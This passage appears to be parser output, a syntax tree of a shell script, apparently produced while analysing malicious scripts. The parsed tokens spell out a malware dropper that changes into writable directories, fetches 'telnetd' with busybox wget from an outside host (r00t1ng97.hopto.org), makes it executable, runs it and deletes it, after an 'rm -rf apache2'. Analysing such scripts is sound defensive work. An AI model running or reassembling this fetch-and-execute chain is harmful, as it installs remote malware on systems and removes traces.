    WordNode(lineno=30, pos=(3532, 3534), word='rm'),
    WordNode(lineno=30, pos=(3535, 3538), word='-rf'),
    WordNode(lineno=30, pos=(3539, 3546), word='apache2'),
  ]),
])
ListNode(lineno=31, pos=(3547, 3710), parts=[
  CommandNode(lineno=31, pos=(3547, 3554), parts=[
    WordNode(lineno=31, pos=(3547, 3549), word='cd'),
    WordNode(lineno=31, pos=(3550, 3554), word='/tmp'),
  ]),
  OperatorNode(lineno=31, op='||', pos=(3555, 3557)),
  CommandNode(lineno=31, pos=(3558, 3569), parts=[
    WordNode(lineno=31, pos=(3558, 3560), word='cd'),
    WordNode(lineno=31, pos=(3561, 3569), word='/var/run'),
  ]),
  OperatorNode(lineno=31, op='||', pos=(3570, 3572)),
  CommandNode(lineno=31, pos=(3573, 3580), parts=[
    WordNode(lineno=31, pos=(3573, 3575), word='cd'),
    WordNode(lineno=31, pos=(3576, 3580), word='/mnt'),
  ]),
  OperatorNode(lineno=31, op='||', pos=(3581, 3583)),
  CommandNode(lineno=31, pos=(3584, 3592), parts=[
    WordNode(lineno=31, pos=(3584, 3586), word='cd'),
    WordNode(lineno=31, pos=(3587, 3592), word='/root'),
  ]),
  OperatorNode(lineno=31, op='||', pos=(3593, 3595)),
  CommandNode(lineno=31, pos=(3596, 3600), parts=[
    WordNode(lineno=31, pos=(3596, 3598), word='cd'),
    WordNode(lineno=31, pos=(3599, 3600), word='/'),
  ]),
  OperatorNode(lineno=31, op=';', pos=(3600, 3601)),
  CommandNode(lineno=31, pos=(3602, 3649), parts=[
    WordNode(lineno=31, pos=(3602, 3609), word='busybox'),
    WordNode(lineno=31, pos=(3610, 3614), word='wget'),
    WordNode(lineno=31, pos=(3615, 3649), word='http://r00t1ng97.hopto.org/telnetd'),
  ]),
  OperatorNode(lineno=31, op=';', pos=(3649, 3650)),
  CommandNode(lineno=31, pos=(3651, 3675), parts=[
    WordNode(lineno=31, pos=(3651, 3658), word='busybox'),
    WordNode(lineno=31, pos=(3659, 3664), word='chmod'),
    WordNode(lineno=31, pos=(3665, 3667), word='+x'),
    WordNode(lineno=31, pos=(3668, 3675), word='telnetd'),
  ]),
  OperatorNode(lineno=31, op=';', pos=(3675, 3676)),
  CommandNode(lineno=31, pos=(3677, 3686), parts=[
    WordNode(lineno=31, pos=(3677, 3686), word='./telnetd'),
  ]),
  OperatorNode(lineno=31, op=';', pos=(3686, 3687)),
  CommandNode(lineno=31, pos=(3688, 3710), parts=[
    WordNode(lineno=31, pos=(3688, 3695), word='busybox'),
    WordNode(lineno=31, pos=(3696, 3698), word='rm'),
    WordNode(lineno=31, pos=(3699, 3702), word='-rf'),
    WordNode(lineno=31, pos=(3703, 3710), word='telnetd'),
  ]),
])
